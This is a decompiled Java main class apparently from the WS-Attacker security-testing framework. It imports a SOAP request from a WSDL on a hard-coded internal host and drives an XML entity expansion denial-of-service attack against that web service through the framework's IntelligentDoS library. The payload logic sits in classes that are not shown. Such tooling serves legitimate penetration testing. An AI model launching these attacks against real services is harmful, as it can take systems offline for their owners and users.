/*
 * Decompiled with CFR 0.152.
 */
package wsattacker.plugin.intelligentdos.main;

import com.eviware.soapui.DefaultSoapUICore;
import com.eviware.soapui.impl.WsdlInterfaceFactory;
import com.eviware.soapui.impl.wsdl.WsdlInterface;
import com.eviware.soapui.impl.wsdl.WsdlOperation;
import com.eviware.soapui.impl.wsdl.WsdlProject;
import com.eviware.soapui.impl.wsdl.WsdlRequest;
import com.eviware.soapui.impl.wsdl.WsdlSubmit;
import com.eviware.soapui.impl.wsdl.WsdlSubmitContext;
import com.eviware.soapui.impl.wsdl.submit.transports.http.WsdlResponse;
import com.eviware.soapui.model.ModelItem;
import com.eviware.soapui.model.iface.Request;
import com.eviware.soapui.model.iface.Response;
import com.eviware.soapui.model.iface.SubmitContext;
import com.eviware.soapui.support.SoapUIException;
import java.io.File;
import java.io.IOException;
import java.util.Date;
import org.apache.commons.cli.BasicParser;
import org.apache.commons.cli.CommandLine;
import org.apache.commons.cli.HelpFormatter;
import org.apache.commons.cli.Option;
import org.apache.commons.cli.OptionBuilder;
import org.apache.commons.cli.Options;
import org.apache.commons.cli.ParseException;
import org.apache.commons.io.FileUtils;
import org.apache.log4j.Appender;
import org.apache.log4j.ConsoleAppender;
import org.apache.log4j.Layout;
import org.apache.log4j.Level;
import org.apache.log4j.Logger;
import org.apache.log4j.PatternLayout;
import org.apache.xmlbeans.XmlException;
import wsattacker.gui.component.log.GuiAppender;
import wsattacker.library.intelligentdos.IntelligentDoSLibrary;
import wsattacker.library.intelligentdos.IntelligentDoSLibraryImpl;
import wsattacker.library.intelligentdos.common.AttackModel;
import wsattacker.library.intelligentdos.dos.DoSAttack;
import wsattacker.library.intelligentdos.dos.XmlEntityExpansion;
import wsattacker.library.intelligentdos.position.PositionIterator;
import wsattacker.library.intelligentdos.position.SchemaAnalyzerPositionIterator;
import wsattacker.library.intelligentdos.success.SimpleSuccessDecider;
import wsattacker.library.intelligentdos.success.SuccessDecider;
import wsattacker.library.schemaanalyzer.SchemaAnalyzer;
import wsattacker.library.schemaanalyzer.SchemaAnalyzerFactory;
import wsattacker.main.composition.testsuite.RequestResponsePair;
import wsattacker.main.testsuite.CurrentRequest;
import wsattacker.plugin.intelligentdos.listener.AttackModelChangeListener;
import wsattacker.plugin.intelligentdos.worker.IntelligentDoSWorker;

public class Main {
    private static final int APACHE = 0;
    private static final int DOTNET = 1;
    private static final int RUB = 2;
    private static Logger LOG;
    private static String fileName;

    public static void main(String[] args) {
        if (args.length > 100) {
            Main.commandLineParser(args);
        }
        fileName = args[0];
        Main.initLoggers();
        long start = System.currentTimeMillis();
        System.out.println("stat at " + new Date());
        try {
            CurrentRequest original = Main.create();
            SchemaAnalyzer schemaAnalyzer = SchemaAnalyzerFactory.getInstance((String)"Web Service");
            String xmlMessage = original.getWsdlRequest().getRequestContent();
            SchemaAnalyzerPositionIterator positionIterator = new SchemaAnalyzerPositionIterator(schemaAnalyzer, xmlMessage);
            IntelligentDoSLibraryImpl intelligentDoSLibraryImpl = new IntelligentDoSLibraryImpl(xmlMessage, (PositionIterator)positionIterator);
            intelligentDoSLibraryImpl.setAttacks(new DoSAttack[]{new XmlEntityExpansion()});
            intelligentDoSLibraryImpl.setSuccessDecider((SuccessDecider)new SimpleSuccessDecider());
            intelligentDoSLibraryImpl.setServerRecoveryTime(20000);
            intelligentDoSLibraryImpl.initialize();
            IntelligentDoSWorker doSWorker = new IntelligentDoSWorker((IntelligentDoSLibrary)intelligentDoSLibraryImpl);
            doSWorker.addListener(new AttackModelChangeListener(){
                private int count = 0;

                @Override
                public void attackModelChanged(AttackModel attackModel) {
                    System.out.println(++this.count + "\t: " + attackModel);
                }
            });
            doSWorker.startAttack((RequestResponsePair)original);
            long stop = System.currentTimeMillis();
            System.out.println("count: " + doSWorker.getCount() + " at " + new Date() + " -> " + (stop - start));
        }
        catch (RuntimeException e) {
            throw e;
        }
        catch (Exception e) {
            e.printStackTrace();
        }
        System.exit(0);
    }

    private static void commandLineParser(String[] args) {
        BasicParser parser = new BasicParser();
        Options options = new Options();
        Option help = new Option("help", "print this message");
        OptionBuilder.withArgName((String)"url");
        OptionBuilder.hasArg();
        OptionBuilder.withDescription((String)"use given url");
        options.addOption(OptionBuilder.create((String)"url"));
        options.addOption(help);
        try {
            CommandLine line = parser.parse(options, args);
            if (line.hasOption("url")) {
                System.out.println(line.getOptionValue("url"));
            }
            HelpFormatter formatter = new HelpFormatter();
            formatter.printHelp("Main", options);
        }
        catch (ParseException exp) {
            System.out.println("Unexpected exception:" + exp.getMessage());
        }
    }

    private static CurrentRequest create() throws XmlException, IOException, SoapUIException, Request.SubmitException {
        String[] operations = new String[]{"reverser", "Reverser", "calculateSecret"};
        int current = 0;
        WsdlProject project = new WsdlProject();
        String host = "pcy1095502";
        String port = "8080";
        String url = "http://" + host + ":" + port + "/AxisWS/wsdl/Converter.wsdl";
        WsdlInterfaceFactory.importWsdl((WsdlProject)project, (String)url, (boolean)false);
        WsdlInterface service = (WsdlInterface)project.getInterfaceAt(0);
        WsdlOperation wsdlOperation = service.getOperationByName(operations[current]);
        WsdlRequest wsdlRequest = wsdlOperation.addNewRequest("Basic Request");
        String requestContent = wsdlOperation.createRequest(true);
        switch (current) {
            case 0: 
            case 1: {
                requestContent = requestContent.replace(">?</", ">Lorem ipsum dolor sit amet</");
                wsdlRequest.setRequestContent(requestContent);
                break;
            }
            case 2: {
                String readFileToString = FileUtils.readFileToString((File)new File(fileName));
                wsdlRequest.setRequestContent(readFileToString);
                break;
            }
            default: {
                throw new IllegalArgumentException(current + " is not allowed");
            }
        }
        WsdlSubmit submit = wsdlRequest.submit((SubmitContext)new WsdlSubmitContext((ModelItem)wsdlRequest), false);
        Response response = submit.getResponse();
        CurrentRequest original = new CurrentRequest();
        original.setWsdlRequest(wsdlRequest);
        original.setWsdlResponse((WsdlResponse)response);
        return original;
    }

    private static void initLoggers() {
        LOG = Logger.getRootLogger();
        Logger.getRootLogger().removeAllAppenders();
        PatternLayout layout = new PatternLayout("%d{ABSOLUTE} %-5p [%c{1}] %m%n");
        LOG.addAppender((Appender)new ConsoleAppender((Layout)layout));
        LOG.addAppender((Appender)new GuiAppender());
        Logger.getLogger((String)"wstester.util").setLevel(Level.INFO);
        Logger.getLogger((String)"wstester.main.PluginCollection").setLevel(Level.INFO);
        Logger.getLogger((String)"com.eviware.soapui").setLevel(Level.OFF);
        Logger.getLogger(DefaultSoapUICore.class).setLevel(Level.OFF);
        Logger.getLogger((String)"com.eviware.soapui.impl").setLevel(Level.OFF);
        LOG = Logger.getLogger(Main.class);
        LOG.setLevel(Level.INFO);
    }

    static {
        fileName = "";
    }
}

